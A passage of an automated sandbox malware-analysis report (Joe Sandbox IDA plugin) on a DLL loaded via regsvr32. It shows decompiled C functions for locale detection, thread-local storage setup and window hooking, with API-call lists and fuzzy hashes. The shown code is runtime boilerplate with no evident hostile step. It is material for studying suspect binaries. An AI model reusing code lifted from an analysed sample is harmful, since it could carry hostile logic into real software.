                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t92 = 0;
                                                                                                                                                                            					L24:
                                                                                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                                                                                                                                            					_pop(_t170);
                                                                                                                                                                            					_pop(_t177);
                                                                                                                                                                            					_pop(_t144);
                                                                                                                                                                            					return E100167D5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                                                                                                                                            				}
                                                                                                                                                                            			}
































                                                                                                                                                                            0x1000aa3a
                                                                                                                                                                            0x1000aa3b
                                                                                                                                                                            0x1000aa41
                                                                                                                                                                            0x1000aa45
                                                                                                                                                                            0x1000aa4c
                                                                                                                                                                            0x1000aa52
                                                                                                                                                                            0x1000aa59
                                                                                                                                                                            0x1000aa6a
                                                                                                                                                                            0x1000aa71
                                                                                                                                                                            0x1000aa74
                                                                                                                                                                            0x1000aa77
                                                                                                                                                                            0x1000aa7a
                                                                                                                                                                            0x1000aa88
                                                                                                                                                                            0x1000aa8b
                                                                                                                                                                            0x1000aa8f
                                                                                                                                                                            0x1000ab5d
                                                                                                                                                                            0x1000ac19
                                                                                                                                                                            0x1000ac1d
                                                                                                                                                                            0x1000ac31
                                                                                                                                                                            0x1000ac34
                                                                                                                                                                            0x1000ac3e
                                                                                                                                                                            0x1000ac44
                                                                                                                                                                            0x1000ac5c
                                                                                                                                                                            0x1000ac68
                                                                                                                                                                            0x1000ac6d
                                                                                                                                                                            0x1000ac70
                                                                                                                                                                            0x1000ac70
                                                                                                                                                                            0x1000ac3e
                                                                                                                                                                            0x1000ab63
                                                                                                                                                                            0x1000ab77
                                                                                                                                                                            0x1000ab82
                                                                                                                                                                            0x1000ab98
                                                                                                                                                                            0x1000aba7
                                                                                                                                                                            0x1000abbf
                                                                                                                                                                            0x1000abc4
                                                                                                                                                                            0x1000abca
                                                                                                                                                                            0x1000abd6
                                                                                                                                                                            0x1000abd9
                                                                                                                                                                            0x1000abeb
                                                                                                                                                                            0x1000abf7
                                                                                                                                                                            0x1000abfc
                                                                                                                                                                            0x1000abff
                                                                                                                                                                            0x1000abff
                                                                                                                                                                            0x1000abca
                                                                                                                                                                            0x1000ac09
                                                                                                                                                                            0x1000ac09
                                                                                                                                                                            0x1000ab82
                                                                                                                                                                            0x1000aa95
                                                                                                                                                                            0x1000aa9d
                                                                                                                                                                            0x1000aaa0
                                                                                                                                                                            0x1000aaa3
                                                                                                                                                                            0x1000aab5
                                                                                                                                                                            0x1000aabe
                                                                                                                                                                            0x1000aac6
                                                                                                                                                                            0x1000aad3
                                                                                                                                                                            0x1000aad6
                                                                                                                                                                            0x1000aadd
                                                                                                                                                                            0x1000aae1
                                                                                                                                                                            0x1000aae5
                                                                                                                                                                            0x1000aae8
                                                                                                                                                                            0x1000aaeb
                                                                                                                                                                            0x1000aaf8
                                                                                                                                                                            0x1000ab04
                                                                                                                                                                            0x1000ab09
                                                                                                                                                                            0x1000ab0c
                                                                                                                                                                            0x1000ab0c
                                                                                                                                                                            0x1000ab13
                                                                                                                                                                            0x1000ab13
                                                                                                                                                                            0x1000ab18
                                                                                                                                                                            0x1000ab1b
                                                                                                                                                                            0x1000ab32
                                                                                                                                                                            0x1000ab39
                                                                                                                                                                            0x1000ab48
                                                                                                                                                                            0x1000ac7e
                                                                                                                                                                            0x1000ac85
                                                                                                                                                                            0x1000ac95
                                                                                                                                                                            0x1000ac98
                                                                                                                                                                            0x1000ac9b
                                                                                                                                                                            0x1000aca2
                                                                                                                                                                            0x1000aca5
                                                                                                                                                                            0x1000acac
                                                                                                                                                                            0x1000acb8
                                                                                                                                                                            0x1000acc2
                                                                                                                                                                            0x1000acc7
                                                                                                                                                                            0x1000acc7
                                                                                                                                                                            0x1000accc
                                                                                                                                                                            0x1000acd1
                                                                                                                                                                            0x1000acee
                                                                                                                                                                            0x1000acee
                                                                                                                                                                            0x1000acf5
                                                                                                                                                                            0x1000acfa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000acd3
                                                                                                                                                                            0x1000acd3
                                                                                                                                                                            0x1000acda
                                                                                                                                                                            0x1000ace2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ace4
                                                                                                                                                                            0x1000ace8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000acea
                                                                                                                                                                            0x1000acec
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000acec
                                                                                                                                                                            0x1000ab4e
                                                                                                                                                                            0x1000ab4e
                                                                                                                                                                            0x1000acfc
                                                                                                                                                                            0x1000acff
                                                                                                                                                                            0x1000ad07
                                                                                                                                                                            0x1000ad08
                                                                                                                                                                            0x1000ad09
                                                                                                                                                                            0x1000ad1e
                                                                                                                                                                            0x1000ad1e

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1000AA59
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
                                                                                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
                                                                                                                                                                            • GetVersion.KERNEL32 ref: 1000AB55
                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000AB7A
                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000AB9F
                                                                                                                                                                            • _sscanf.LIBCMT ref: 1000ABBF
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 1000ABF4
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(75144EE0), ref: 1000ABFA
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 1000AC09
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1000AC19
                                                                                                                                                                            • EnumResourceLanguagesA.KERNEL32 ref: 1000AC34
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 1000AC65
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(75144EE0), ref: 1000AC6B
                                                                                                                                                                            • _memset.LIBCMT ref: 1000AC85
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                                                                            • API String ID: 434808117-483790700
                                                                                                                                                                            • Opcode ID: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
                                                                                                                                                                            • Instruction ID: 772d67b6ef5536ffa942379cc2d037747f9683b4a435f76ff704d577c4812cba
                                                                                                                                                                            • Opcode Fuzzy Hash: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
                                                                                                                                                                            • Instruction Fuzzy Hash: 638182B0D002699FEB10DFA5DC84AFEBBF9FB49350F500626E554E7280DB749A85CB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                            			E1001C11B(void* __ebx) {
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				_Unknown_base(*)()* _t7;
                                                                                                                                                                            				long _t10;
                                                                                                                                                                            				void* _t11;
                                                                                                                                                                            				int _t12;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                            				long _t26;
                                                                                                                                                                            				void* _t30;
                                                                                                                                                                            				struct HINSTANCE__* _t37;
                                                                                                                                                                            				void* _t40;
                                                                                                                                                                            				void* _t42;
                                                                                                                                                                            
                                                                                                                                                                            				_t30 = __ebx;
                                                                                                                                                                            				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                                                                            				if(_t37 != 0) {
                                                                                                                                                                            					 *0x1005aea4 = GetProcAddress(_t37, "FlsAlloc");
                                                                                                                                                                            					 *0x1005aea8 = GetProcAddress(_t37, "FlsGetValue");
                                                                                                                                                                            					 *0x1005aeac = GetProcAddress(_t37, "FlsSetValue");
                                                                                                                                                                            					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                                                                                                            					__eflags =  *0x1005aea4;
                                                                                                                                                                            					_t40 = TlsSetValue;
                                                                                                                                                                            					 *0x1005aeb0 = _t7;
                                                                                                                                                                            					if( *0x1005aea4 == 0) {
                                                                                                                                                                            						L6:
                                                                                                                                                                            						 *0x1005aea8 = TlsGetValue;
                                                                                                                                                                            						 *0x1005aea4 = E1001BDD2;
                                                                                                                                                                            						 *0x1005aeac = _t40;
                                                                                                                                                                            						 *0x1005aeb0 = TlsFree;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eflags =  *0x1005aea8;
                                                                                                                                                                            						if( *0x1005aea8 == 0) {
                                                                                                                                                                            							goto L6;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							__eflags =  *0x1005aeac;
                                                                                                                                                                            							if( *0x1005aeac == 0) {
                                                                                                                                                                            								goto L6;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eflags = _t7;
                                                                                                                                                                            								if(_t7 == 0) {
                                                                                                                                                                            									goto L6;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_t10 = TlsAlloc();
                                                                                                                                                                            					__eflags = _t10 - 0xffffffff;
                                                                                                                                                                            					 *0x10057d30 = _t10;
                                                                                                                                                                            					if(_t10 == 0xffffffff) {
                                                                                                                                                                            						L15:
                                                                                                                                                                            						_t11 = 0;
                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t12 = TlsSetValue(_t10,  *0x1005aea8);
                                                                                                                                                                            						__eflags = _t12;
                                                                                                                                                                            						if(_t12 == 0) {
                                                                                                                                                                            							goto L15;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E10018042();
                                                                                                                                                                            							 *0x1005aea4 = E1001BD03( *0x1005aea4);
                                                                                                                                                                            							 *0x1005aea8 = E1001BD03( *0x1005aea8);
                                                                                                                                                                            							 *0x1005aeac = E1001BD03( *0x1005aeac);
                                                                                                                                                                            							 *0x1005aeb0 = E1001BD03( *0x1005aeb0);
                                                                                                                                                                            							_t18 = E1001A3D3();
                                                                                                                                                                            							__eflags = _t18;
                                                                                                                                                                            							if(_t18 == 0) {
                                                                                                                                                                            								L14:
                                                                                                                                                                            								E1001BE05();
                                                                                                                                                                            								goto L15;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_push(E1001BF91);
                                                                                                                                                                            								_t21 =  *((intOrPtr*)(E1001BD6F( *0x1005aea4)))();
                                                                                                                                                                            								__eflags = _t21 - 0xffffffff;
                                                                                                                                                                            								 *0x10057d2c = _t21;
                                                                                                                                                                            								if(_t21 == 0xffffffff) {
                                                                                                                                                                            									goto L14;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t42 = E1001E76E(1, 0x214);
                                                                                                                                                                            									__eflags = _t42;
                                                                                                                                                                            									if(_t42 == 0) {
                                                                                                                                                                            										goto L14;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_push(_t42);
                                                                                                                                                                            										_push( *0x10057d2c);
                                                                                                                                                                            										__eflags =  *((intOrPtr*)(E1001BD6F( *0x1005aeac)))();
                                                                                                                                                                            										if(__eflags == 0) {
                                                                                                                                                                            											goto L14;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_push(0);
                                                                                                                                                                            											_push(_t42);
                                                                                                                                                                            											E1001BE42(_t30, _t37, _t42, __eflags);
                                                                                                                                                                            											_t26 = GetCurrentThreadId();
                                                                                                                                                                            											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                                                                                            											 *_t42 = _t26;
                                                                                                                                                                            											_t11 = 1;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					return _t11;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					E1001BE05();
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            			}
















                                                                                                                                                                            0x1001c11b
                                                                                                                                                                            0x1001c127
                                                                                                                                                                            0x1001c12b
                                                                                                                                                                            0x1001c14b
                                                                                                                                                                            0x1001c158
                                                                                                                                                                            0x1001c165
                                                                                                                                                                            0x1001c16a
                                                                                                                                                                            0x1001c16c
                                                                                                                                                                            0x1001c173
                                                                                                                                                                            0x1001c179
                                                                                                                                                                            0x1001c17e
                                                                                                                                                                            0x1001c196
                                                                                                                                                                            0x1001c19b
                                                                                                                                                                            0x1001c1a5
                                                                                                                                                                            0x1001c1af
                                                                                                                                                                            0x1001c1b5
                                                                                                                                                                            0x1001c180
                                                                                                                                                                            0x1001c180
                                                                                                                                                                            0x1001c187
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c189
                                                                                                                                                                            0x1001c189
                                                                                                                                                                            0x1001c190
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c192
                                                                                                                                                                            0x1001c192
                                                                                                                                                                            0x1001c194
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c194
                                                                                                                                                                            0x1001c190
                                                                                                                                                                            0x1001c187
                                                                                                                                                                            0x1001c1ba
                                                                                                                                                                            0x1001c1c0
                                                                                                                                                                            0x1001c1c3
                                                                                                                                                                            0x1001c1c8
                                                                                                                                                                            0x1001c29a
                                                                                                                                                                            0x1001c29a
                                                                                                                                                                            0x1001c29a
                                                                                                                                                                            0x1001c1ce
                                                                                                                                                                            0x1001c1d5
                                                                                                                                                                            0x1001c1d7
                                                                                                                                                                            0x1001c1d9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c1df
                                                                                                                                                                            0x1001c1df
                                                                                                                                                                            0x1001c1f5
                                                                                                                                                                            0x1001c205
                                                                                                                                                                            0x1001c215
                                                                                                                                                                            0x1001c222
                                                                                                                                                                            0x1001c227
                                                                                                                                                                            0x1001c22c
                                                                                                                                                                            0x1001c22e
                                                                                                                                                                            0x1001c295
                                                                                                                                                                            0x1001c295
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c230
                                                                                                                                                                            0x1001c230
                                                                                                                                                                            0x1001c241
                                                                                                                                                                            0x1001c243
                                                                                                                                                                            0x1001c246
                                                                                                                                                                            0x1001c24b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c24d
                                                                                                                                                                            0x1001c259
                                                                                                                                                                            0x1001c25b
                                                                                                                                                                            0x1001c25f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c261
                                                                                                                                                                            0x1001c261
                                                                                                                                                                            0x1001c262
                                                                                                                                                                            0x1001c276
                                                                                                                                                                            0x1001c278
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c27a
                                                                                                                                                                            0x1001c27a
                                                                                                                                                                            0x1001c27c
                                                                                                                                                                            0x1001c27d
                                                                                                                                                                            0x1001c284
                                                                                                                                                                            0x1001c28a
                                                                                                                                                                            0x1001c28e
                                                                                                                                                                            0x1001c292
                                                                                                                                                                            0x1001c292
                                                                                                                                                                            0x1001c278
                                                                                                                                                                            0x1001c25f
                                                                                                                                                                            0x1001c24b
                                                                                                                                                                            0x1001c22e
                                                                                                                                                                            0x1001c1d9
                                                                                                                                                                            0x1001c29e
                                                                                                                                                                            0x1001c12d
                                                                                                                                                                            0x1001c12d
                                                                                                                                                                            0x1001c135
                                                                                                                                                                            0x1001c135

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10017978,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C121
                                                                                                                                                                            • __mtterm.LIBCMT ref: 1001C12D
                                                                                                                                                                              • Part of subcall function 1001BE05: __decode_pointer.LIBCMT ref: 1001BE16
                                                                                                                                                                              • Part of subcall function 1001BE05: TlsFree.KERNEL32(0000001E,10017A14,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001BE30
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001C143
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001C150
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1001C15D
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001C16A
                                                                                                                                                                            • TlsAlloc.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1BA
                                                                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1D5
                                                                                                                                                                            • __init_pointers.LIBCMT ref: 1001C1DF
                                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1001C1EA
                                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1001C1FA
                                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1001C20A
                                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1001C21A
                                                                                                                                                                            • __decode_pointer.LIBCMT ref: 1001C23B
                                                                                                                                                                            • __calloc_crt.LIBCMT ref: 1001C254
                                                                                                                                                                            • __decode_pointer.LIBCMT ref: 1001C26E
                                                                                                                                                                            • __initptd.LIBCMT ref: 1001C27D
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 1001C284
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                            • API String ID: 2657569430-3819984048
                                                                                                                                                                            • Opcode ID: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
                                                                                                                                                                            • Instruction ID: b5f7097eefea174a9ed91942db92a94305995674aef8197461d434292f48097b
                                                                                                                                                                            • Opcode Fuzzy Hash: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
                                                                                                                                                                            • Instruction Fuzzy Hash: E4319335900735AFEB11EFB59CCEA4A3BF1EB46360B144526F5049A1B1EBB5D8C0CB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                            			E10011389(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                            				void* _t55;
                                                                                                                                                                            				signed int _t56;
                                                                                                                                                                            				void* _t59;
                                                                                                                                                                            				long _t60;
                                                                                                                                                                            				signed int _t64;
                                                                                                                                                                            				void* _t66;
                                                                                                                                                                            				short _t72;
                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                            				long _t83;
                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                            				signed short _t87;
                                                                                                                                                                            				signed int _t88;
                                                                                                                                                                            				int _t94;
                                                                                                                                                                            				void* _t106;
                                                                                                                                                                            				long* _t108;
                                                                                                                                                                            				long _t110;
                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                            				CHAR* _t112;
                                                                                                                                                                            				intOrPtr _t113;
                                                                                                                                                                            				void* _t116;
                                                                                                                                                                            				void* _t119;
                                                                                                                                                                            				intOrPtr _t120;
                                                                                                                                                                            
                                                                                                                                                                            				_t119 = __eflags;
                                                                                                                                                                            				_t105 = __edi;
                                                                                                                                                                            				_push(0x148);
                                                                                                                                                                            				E10017C2A(E1002866E, __ebx, __edi, __esi);
                                                                                                                                                                            				_t110 =  *(_t116 + 0x10);
                                                                                                                                                                            				_t94 =  *(_t116 + 0xc);
                                                                                                                                                                            				_push(0x1000a0f5);
                                                                                                                                                                            				 *(_t116 - 0x120) = _t110;
                                                                                                                                                                            				_t54 = E10013D98(_t94, 0x10058f44, __edi, _t110, _t119);
                                                                                                                                                                            				_t120 = _t54;
                                                                                                                                                                            				_t97 = 0 | _t120 == 0x00000000;
                                                                                                                                                                            				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
                                                                                                                                                                            				_t121 = _t120 == 0;
                                                                                                                                                                            				if(_t120 == 0) {
                                                                                                                                                                            					_t54 = E1000A0DB(_t94, _t97, __edi, _t110, _t121);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *(_t116 + 8) == 3) {
                                                                                                                                                                            					_t106 =  *_t110;
                                                                                                                                                                            					_t111 =  *(_t54 + 0x14);
                                                                                                                                                                            					_t55 = E1000D5EC(_t94, _t106, _t111, __eflags);
                                                                                                                                                                            					__eflags = _t111;
                                                                                                                                                                            					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                                                                                                                                            					 *(_t116 - 0x124) = _t56;
                                                                                                                                                                            					if(_t111 != 0) {
                                                                                                                                                                            						L7:
                                                                                                                                                                            						__eflags =  *0x1005acbc;
                                                                                                                                                                            						if( *0x1005acbc == 0) {
                                                                                                                                                                            							L12:
                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								__eflags =  *0x1005a8dc;
                                                                                                                                                                            								if( *0x1005a8dc != 0) {
                                                                                                                                                                            									L19:
                                                                                                                                                                            									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1005a8dc; // 0x0
                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                            										L23:
                                                                                                                                                                            										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                                                                                                                                            										__eflags = _t59;
                                                                                                                                                                            										 *(_t116 - 0x14) = _t59;
                                                                                                                                                                            										if(_t59 != 0) {
                                                                                                                                                                            											_t112 = "AfxOldWndProc423";
                                                                                                                                                                            											_t64 = GetPropA(_t94, _t112);
                                                                                                                                                                            											__eflags = _t64;
                                                                                                                                                                            											if(_t64 == 0) {
                                                                                                                                                                            												SetPropA(_t94, _t112,  *(_t116 - 0x14));
                                                                                                                                                                            												_t66 = GetPropA(_t94, _t112);
                                                                                                                                                                            												__eflags = _t66 -  *(_t116 - 0x14);
                                                                                                                                                                            												if(_t66 ==  *(_t116 - 0x14)) {
                                                                                                                                                                            													GlobalAddAtomA(_t112);
                                                                                                                                                                            													SetWindowLongA(_t94, 0xfffffffc, E10011245);
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            										L27:
                                                                                                                                                                            										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
                                                                                                                                                                            										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
                                                                                                                                                                            										__eflags =  *(_t116 - 0x124);
                                                                                                                                                                            										_t110 = _t60;
                                                                                                                                                                            										if( *(_t116 - 0x124) != 0) {
                                                                                                                                                                            											UnhookWindowsHookEx( *(_t105 + 0x28));
                                                                                                                                                                            											_t50 = _t105 + 0x28;
                                                                                                                                                                            											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
                                                                                                                                                                            											__eflags =  *_t50;
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L30;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t113 = 0x30;
                                                                                                                                                                            								E100174D0(_t106, _t116 - 0x154, 0, _t113);
                                                                                                                                                                            								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
                                                                                                                                                                            								_push(_t116 - 0x154);
                                                                                                                                                                            								_push("#32768");
                                                                                                                                                                            								_push(0);
                                                                                                                                                                            								_t72 = E1000E5E2(_t94, _t97, _t106, "#32768", __eflags);
                                                                                                                                                                            								__eflags = _t72;
                                                                                                                                                                            								 *0x1005a8dc = _t72;
                                                                                                                                                                            								if(_t72 == 0) {
                                                                                                                                                                            									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
                                                                                                                                                                            									__eflags = _t74;
                                                                                                                                                                            									if(_t74 == 0) {
                                                                                                                                                                            										goto L23;
                                                                                                                                                                            									}
                                                                                                                                                                            									 *((char*)(_t116 - 0x19)) = 0;
                                                                                                                                                                            									_t76 = E100199C1(_t116 - 0x118, "#32768");
                                                                                                                                                                            									__eflags = _t76;
                                                                                                                                                                            									if(_t76 == 0) {
                                                                                                                                                                            										goto L27;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L23;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L19;
                                                                                                                                                                            							}
                                                                                                                                                                            							E1000D638(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
                                                                                                                                                                            							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
                                                                                                                                                                            							E1000FB9D(_t111, _t116, _t94);
                                                                                                                                                                            							 *((intOrPtr*)( *_t111 + 0x50))();
                                                                                                                                                                            							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
                                                                                                                                                                            							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001025C);
                                                                                                                                                                            							__eflags = _t83 - E1001025C;
                                                                                                                                                                            							if(_t83 != E1001025C) {
                                                                                                                                                                            								 *_t108 = _t83;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
                                                                                                                                                                            							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
                                                                                                                                                                            							__eflags =  *(_t116 - 0x14);
                                                                                                                                                                            							if( *(_t116 - 0x14) != 0) {
                                                                                                                                                                            								_push( *(_t116 - 0x18));
                                                                                                                                                                            								_push(0);
                                                                                                                                                                            								E1000CEFC();
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L27;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                                                                                                                                            						__eflags = _t86 & 0x00010000;
                                                                                                                                                                            						if((_t86 & 0x00010000) != 0) {
                                                                                                                                                                            							goto L27;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t87 =  *(_t106 + 0x28);
                                                                                                                                                                            						__eflags = _t87 - 0xffff;
                                                                                                                                                                            						if(_t87 <= 0xffff) {
                                                                                                                                                                            							 *(_t116 - 0x18) = 0;
                                                                                                                                                                            							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
                                                                                                                                                                            							_t87 = _t116 - 0x18;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t88 = E1000A7E1(_t87, "ime");
                                                                                                                                                                            						__eflags = _t88;
